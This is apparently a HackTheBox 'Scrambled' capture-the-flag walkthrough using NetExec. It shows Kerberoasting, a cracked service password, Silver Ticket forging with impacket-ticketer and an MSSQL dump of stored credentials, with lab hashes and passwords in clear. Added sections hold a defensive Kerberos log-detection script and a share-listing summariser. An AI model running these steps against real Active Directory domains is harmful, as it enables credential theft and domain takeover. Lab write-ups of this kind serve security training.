Let's pwn the box Scrambled from HackTheBox using only NetExec! For context, I was reading the Scrambled writeup from 0xdf_ when I came across this:
smbclient won’t work, and I wasn’t able to get crackmapexec to work either.
To be fair, at the time of his writeup that was true, but it isn't anymore: with NXC it's pretty simple, 5 minutes and you get root :)
Note: I will skip the web part, where we get one username: ksimpson
netexec ldap 10.10.11.168
LDAP 10.10.11.168 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
- Target: DC1.scrm.local
- Domain: scrm.local
We can add DC1.scrm.local to our /etc/hosts file.
netexec ldap DC1.scrm.local -u ksimpson -p blabla
LDAP dc1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAP dc1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla STATUS_NOT_SUPPORTED
# with kerberos
netexec ldap DC1.scrm.local -u ksimpson -p blabla -k
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAP DC1.scrm.local 389 DC1.scrm.local [-] scrm.local\ksimpson:blabla KDC_ERR_PREAUTH_FAILED
KDC_ERR_PREAUTH_FAILED => means we have a valid username but a bad password! Let's try login = password ;) Also, you may have noticed the STATUS_NOT_SUPPORTED without the Kerberos option: it means NTLM is disabled on the domain, no big deal for NXC ;)
netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson
netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --shares
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson
SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares
SMB DC1.scrm.local 445 DC1.scrm.local Share Permissions Remark
SMB DC1.scrm.local 445 DC1.scrm.local ----- ----------- ------
SMB DC1.scrm.local 445 DC1.scrm.local ADMIN$ Remote Admin
SMB DC1.scrm.local 445 DC1.scrm.local C$ Default share
SMB DC1.scrm.local 445 DC1.scrm.local HR
SMB DC1.scrm.local 445 DC1.scrm.local IPC$ READ Remote IPC
SMB DC1.scrm.local 445 DC1.scrm.local IT
SMB DC1.scrm.local 445 DC1.scrm.local NETLOGON READ Logon server share
SMB DC1.scrm.local 445 DC1.scrm.local Public READ
SMB DC1.scrm.local 445 DC1.scrm.local Sales
SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ Logon server share
The user can read the "Public" share.
netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k -M spider_plus
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option:
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['print$']
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk']
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/nxc_spider_plus
cat /tmp/nxc_spider_plus/DC1.scrm.local.json | grep 'Public' -A 6
"Public": {
"Network Security Changes.pdf": {
"atime_epoch": "2021-11-04 18:23:11",
"ctime_epoch": "2021-11-04 18:20:49",
"mtime_epoch": "2021-11-05 13:45:07",
"size": "615.34 KB"
}
There is one file, "Network Security Changes.pdf", so let's grab it :)
netexec smb DC1.scrm.local -u ksimpson -p ksimpson -d scrm.local -k --get-file 'Network Security Changes.pdf' /tmp/Network_Security_Changes.pdf --share "Public"
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\ksimpson:ksimpson
SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Network Security Changes.pdf to /tmp/Network_Security_Changes.pdf
SMB DC1.scrm.local 445 DC1.scrm.local [+] File Network Security Changes.pdf was transferred to /tmp/Network_Security_Changes.pdf
netexec ldap DC1.scrm.local -u ksimpson -p ksimpson -k --kerberoasting /tmp/hash
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\ksimpson
LDAPS DC1.scrm.local 636 DC1.scrm.local [*] Total of records returned 2
LDAPS DC1.scrm.local 636 DC1.scrm.local sAMAccountName: sqlsvc memberOf: pwdLastSet: 2021-11-03 12:32:02.351452 lastLogon:2022-11-01 15:06:06.512547
LDAPS DC1.scrm.local 636 DC1.scrm.local $krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$3b7c5f0a4c366bceb1bb3f7747a898b8$... (hash truncated)
# checking creds after cracking with Hashcat
netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc
netexec mssql DC1.scrm.local -u sqlsvc -p Pegasus60 -d scrm.local -k
MSSQL DC1.scrm.local 1433 None [*] None (name:DC1.scrm.local) (domain:scrm.local)
MSSQL DC1.scrm.local 1433 None [-] ERROR(DC1): Line 1: Login failed for user 'SCRM\sqlsvc'
The user cannot connect to MSSQL (very strange, but I guess it's on purpose so that we exploit a Kerberos Silver Ticket, which is very cool!)
netexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
LDAP DC1.scrm.local 389 DC1.scrm.local [*] x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
LDAPS DC1.scrm.local 636 DC1.scrm.local [+] scrm.local\sqlsvc
LDAPS DC1.scrm.local 636 DC1.scrm.local Domain SID S-1-5-21-2743207045-1827831105-2542523200
Notice the automatic switch between LDAP and LDAPS! :D
impacket-ticketer -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator
Impacket v0.10.1.dev1+20220720.103933.3c6713e3 - Copyright 2022 SecureAuth Corporation
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in administrator.ccache
export KRB5CCNAME=administrator.ccache
netexec mssql DC1.scrm.local --use-kcache
MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:)
MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!)
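From the defender's side, the two steps above leave different traces: the Kerberoasting step makes the KDC issue a TGS for the sqlsvc service account (the $krb5tgs$23$ prefix shows it was an RC4 ticket), while the Silver Ticket is forged offline with the service account's key and never passes through the KDC, so the DC has no 4769 for administrator even though the service accepts the ticket. The following script is an added example, not part of the original writeup or of NetExec: it runs both checks over constructed Security-log events (the event field names follow the Windows 4769/4624 schema, the values and the SILVER_WINDOW_MIN threshold are assumptions for the demo).

```python
"""
Two Kerberos detections over constructed sample events (added example, not NetExec code).

1. rc4_service_tickets: 4769 events where a user (non-machine) service account was
   issued an RC4-HMAC ticket (TicketEncryptionType 0x17) - the classic Kerberoast signal.
2. logons_without_tgs: Kerberos network logons (4624, LogonType 3) on a service host
   with no 4769 for that user on the DC shortly before - a Silver Ticket never gets a 4769.
"""
from collections import defaultdict
from datetime import datetime

SILVER_WINDOW_MIN = 10  # assumed: how far back to look for the matching TGS request


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


# Constructed DC-side events (Security log of the KDC). Values are invented.
DC_EVENTS = [
    {"ts": "2022-11-01 15:00:01", "EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL",
     "ServiceName": "DC1$", "TicketEncryptionType": "0x12"},      # AES256 TGS for the DC itself: normal
    {"ts": "2022-11-01 15:05:10", "EventID": 4769, "TargetUserName": "ksimpson@SCRM.LOCAL",
     "ServiceName": "sqlsvc", "TicketEncryptionType": "0x17"},    # RC4 TGS for a user service account
]

# Constructed service-side events (Security log of the host running MSSQL).
SERVICE_EVENTS = [
    {"ts": "2022-11-01 15:00:03", "EventID": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "ksimpson"},
    {"ts": "2022-11-01 15:20:44", "EventID": 4624, "LogonType": 3,
     "AuthenticationPackageName": "Kerberos", "TargetUserName": "administrator"},
]


def _user(name):
    """Normalise 'ksimpson@SCRM.LOCAL' / 'SCRM\\ksimpson' / 'ksimpson' to 'ksimpson'."""
    return name.split("@")[0].split("\\")[-1].lower()


def rc4_service_tickets(dc_events):
    """(requesting user, service account) pairs for RC4 TGS requests to non-machine accounts."""
    hits = []
    for e in dc_events:
        if e["EventID"] != 4769 or e["TicketEncryptionType"].lower() != "0x17":
            continue
        svc = e["ServiceName"]
        if svc.endswith("$") or svc.lower() == "krbtgt":  # machine accounts and krbtgt are not roastable targets
            continue
        hits.append((_user(e["TargetUserName"]), svc))
    return hits


def logons_without_tgs(dc_events, service_events, window_min=SILVER_WINDOW_MIN):
    """Kerberos network logons whose user obtained no TGS on the DC within the window before them."""
    tgs_times = defaultdict(list)
    for e in dc_events:
        if e["EventID"] == 4769:
            tgs_times[_user(e["TargetUserName"])].append(parse_ts(e["ts"]))

    suspicious = []
    for e in service_events:
        if e["EventID"] != 4624 or e["LogonType"] != 3 or e["AuthenticationPackageName"] != "Kerberos":
            continue
        t = parse_ts(e["ts"])
        recent = [x for x in tgs_times.get(_user(e["TargetUserName"]), [])
                  if 0 <= (t - x).total_seconds() <= window_min * 60]
        if not recent:
            suspicious.append(_user(e["TargetUserName"]))
    return suspicious


if __name__ == "__main__":
    print("possible Kerberoast:", rc4_service_tickets(DC_EVENTS))
    print("Kerberos logon without TGS (possible Silver Ticket):",
          logons_without_tgs(DC_EVENTS, SERVICE_EVENTS))
```

Two caveats for real logs: 4769 is only written when the "Audit Kerberos Service Ticket Operations" subcategory is enabled on the DCs, and a legitimate client can reuse a cached service ticket for hours, so the window check needs to be longer than the ticket lifetime (or keyed on the ticket itself) before it is more than a triage hint. The RC4 check is the stronger of the two: a domain that only uses AES for its service accounts makes the sqlsvc ticket above stand out immediately.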
netexec mssql DC1.scrm.local --use-kcache --query "SELECT LdapUser,LdapPwd from ScrambleHR.dbo.UserImport;"
MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:)
MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!)
MSSQL dc1.scrm.local 1433 NONE LdapUser
MSSQL dc1.scrm.local 1433 NONE LdapPwd
MSSQL dc1.scrm.local 1433 NONE --------------------------------------------------
MSSQL dc1.scrm.local 1433 NONE --------------------------------------------------
MSSQL dc1.scrm.local 1433 NONE MiscSvc
MSSQL dc1.scrm.local 1433 NONE ScrambledEggs9900
# checking new creds
netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
We got a new user:
- User: MiscSvc
- Password: ScrambledEggs9900
netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\miscsvc\\desktop\\user.txt' /tmp/user.txt
MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:)
MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!)
MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\miscsvc\\desktop\\user.txt to /tmp/user.txt
MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\miscsvc\\desktop\\user.txt was transferred to /tmp/user.txt
netexec mssql DC1.scrm.local --use-kcache --get-file 'c:\\users\\administrator\\desktop\\root.txt' /tmp/root.txt
MSSQL dc1.scrm.local 1433 NONE [*] (name:) (domain:)
MSSQL dc1.scrm.local 1433 NONE [+] \ from ccache (Pwn3d!)
MSSQL dc1.scrm.local 1433 NONE [*] Copy c:\\users\\administrator\\desktop\\root.txt to /tmp/root.txt
MSSQL dc1.scrm.local 1433 NONE [+] File c:\\users\\administrator\\desktop\\root.txt was transferred to /tmp/root.txt
cat /tmp/root.txt
936c171e740f3009a405919f03a05644
We have the root flag, but it seems this is not the end, so let's keep going for fun :)
netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --shares
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
SMB DC1.scrm.local 445 DC1.scrm.local [+] Enumerated shares
SMB DC1.scrm.local 445 DC1.scrm.local Share Permissions Remark
SMB DC1.scrm.local 445 DC1.scrm.local ----- ----------- ------
SMB DC1.scrm.local 445 DC1.scrm.local ADMIN$ Remote Admin
SMB DC1.scrm.local 445 DC1.scrm.local C$ Default share
SMB DC1.scrm.local 445 DC1.scrm.local HR
SMB DC1.scrm.local 445 DC1.scrm.local IPC$ READ Remote IPC
SMB DC1.scrm.local 445 DC1.scrm.local IT READ
SMB DC1.scrm.local 445 DC1.scrm.local NETLOGON READ Logon server share
SMB DC1.scrm.local 445 DC1.scrm.local Public READ
SMB DC1.scrm.local 445 DC1.scrm.local Sales
SMB DC1.scrm.local 445 DC1.scrm.local SYSVOL READ Logon server share
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] Started spidering plus with option:
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] DIR: ['netlogon', 'public', 'sysvol', 'ipc$']
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] EXT: ['ico', 'lnk']
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] SIZE: 51200
SPIDER_P... DC1.scrm.local 445 DC1.scrm.local [*] OUTPUT: /tmp/nxc_spider_plus
cat /tmp/nxc_spider_plus/DC1.scrm.local.json
{
"IT": {
"Apps/Sales Order Client/ScrambleClient.exe": {
"atime_epoch": "2021-11-05 16:57:06",
"ctime_epoch": "2021-11-05 16:47:10",
"mtime_epoch": "2021-11-05 16:57:08",
"size": "84.5 KB"
},
"Apps/Sales Order Client/ScrambleLib.dll": {
"atime_epoch": "2021-11-05 16:57:06",
"ctime_epoch": "2021-11-05 16:47:10",
"mtime_epoch": "2021-11-05 16:57:08",
"size": "19 KB"
}
}
}
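The spider_plus JSON shown here and after the first spider run maps share -> relative path -> {atime_epoch, ctime_epoch, mtime_epoch, size}, with timestamps written as "YYYY-MM-DD HH:MM:SS" and sizes as human-readable strings such as "615.34 KB". When auditing which files a low-privileged account can read (the readable IT share handing out a thick client and its DLL is exactly what you want to find), a small summariser is handier than grep. The script below is an added example, not NetExec's own code; SAMPLE_JSON is a constructed copy of the two dumps above, and the parse_size rounding and the helper names are my assumptions.

```python
"""
Summarise a NetExec spider_plus dump (/tmp/nxc_spider_plus/<host>.json).
Added example, not part of NetExec; SAMPLE_JSON is constructed from the dumps above.
"""
import json
import os
from datetime import datetime

SAMPLE_JSON = """
{
  "Public": {
    "Network Security Changes.pdf": {
      "atime_epoch": "2021-11-04 18:23:11",
      "ctime_epoch": "2021-11-04 18:20:49",
      "mtime_epoch": "2021-11-05 13:45:07",
      "size": "615.34 KB"
    }
  },
  "IT": {
    "Apps/Sales Order Client/ScrambleClient.exe": {
      "atime_epoch": "2021-11-05 16:57:06",
      "ctime_epoch": "2021-11-05 16:47:10",
      "mtime_epoch": "2021-11-05 16:57:08",
      "size": "84.5 KB"
    },
    "Apps/Sales Order Client/ScrambleLib.dll": {
      "atime_epoch": "2021-11-05 16:57:06",
      "ctime_epoch": "2021-11-05 16:47:10",
      "mtime_epoch": "2021-11-05 16:57:08",
      "size": "19 KB"
    }
  }
}
"""

_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}


def parse_size(text):
    """'615.34 KB' -> 630108 (bytes, rounded; assumes binary units)."""
    number, unit = text.split()
    return round(float(number) * _UNITS[unit.upper()])


def parse_ts(text):
    # Despite the '_epoch' suffix, spider_plus writes human-readable timestamps.
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def load_spider_plus(raw):
    """Flatten share -> path -> metadata into a list of file records."""
    records = []
    for share, files in json.loads(raw).items():
        for path, meta in files.items():
            records.append({
                "share": share,
                "path": path,
                "ext": os.path.splitext(path)[1].lstrip(".").lower(),
                "size": parse_size(meta["size"]),
                "mtime": parse_ts(meta["mtime_epoch"]),
            })
    return records


def share_summary(records):
    """Per-share file count and total bytes."""
    out = {}
    for r in records:
        s = out.setdefault(r["share"], {"files": 0, "bytes": 0})
        s["files"] += 1
        s["bytes"] += r["size"]
    return out


def files_with_ext(records, exts):
    """'share/path' strings for files whose extension is in exts (case-insensitive)."""
    wanted = {e.lower().lstrip(".") for e in exts}
    return sorted(f"{r['share']}/{r['path']}" for r in records if r["ext"] in wanted)


def newest(records, n=3):
    """The n most recently modified files (stable sort keeps dump order on ties)."""
    ordered = sorted(records, key=lambda r: r["mtime"], reverse=True)
    return [f"{r['share']}/{r['path']}" for r in ordered[:n]]


if __name__ == "__main__":
    recs = load_spider_plus(SAMPLE_JSON)
    print(share_summary(recs))
    print("binaries in readable shares:", files_with_ext(recs, ["exe", "dll"]))
    print("newest:", newest(recs))
```

Point it at the real dump with `load_spider_plus(open("/tmp/nxc_spider_plus/DC1.scrm.local.json").read())`; the exe/dll filter is the one that surfaces the Sales Order Client in the IT share without reading the whole JSON.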
crackmapexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleClient.exe' /tmp/file.exe --share "IT"
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleClient.exe to /tmp/file.exe
SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleClient.exe was transferred to /tmp/file.exe
netexec smb DC1.scrm.local -u MiscSvc -p ScrambledEggs9900 -d scrm.local -k --get-file 'Apps/Sales Order Client/ScrambleLib.dll' /tmp/file.dll --share "IT"
SMB DC1.scrm.local 445 DC1.scrm.local [*] None x64 (name:DC1.scrm.local) (domain:scrm.local) (signing:True) (SMBv1:False)
SMB DC1.scrm.local 445 DC1.scrm.local [+] scrm.local\MiscSvc:ScrambledEggs9900
SMB DC1.scrm.local 445 DC1.scrm.local [*] Copy Apps/Sales Order Client/ScrambleLib.dll to /tmp/file.dll
SMB DC1.scrm.local 445 DC1.scrm.local [+] File Apps/Sales Order Client/ScrambleLib.dll was transferred to /tmp/file.dll
For the rest, follow https://0xdf.gitlab.io/2022/10/01/htb-scrambled-linux.html => the "ScrambleClient Reverse" part!
That's all from me, I hope you learned a bit more about NetExec. For the latest news follow me on Twitter => @mpgn_x64, and follow @0xdf_ for the HTB writeup :)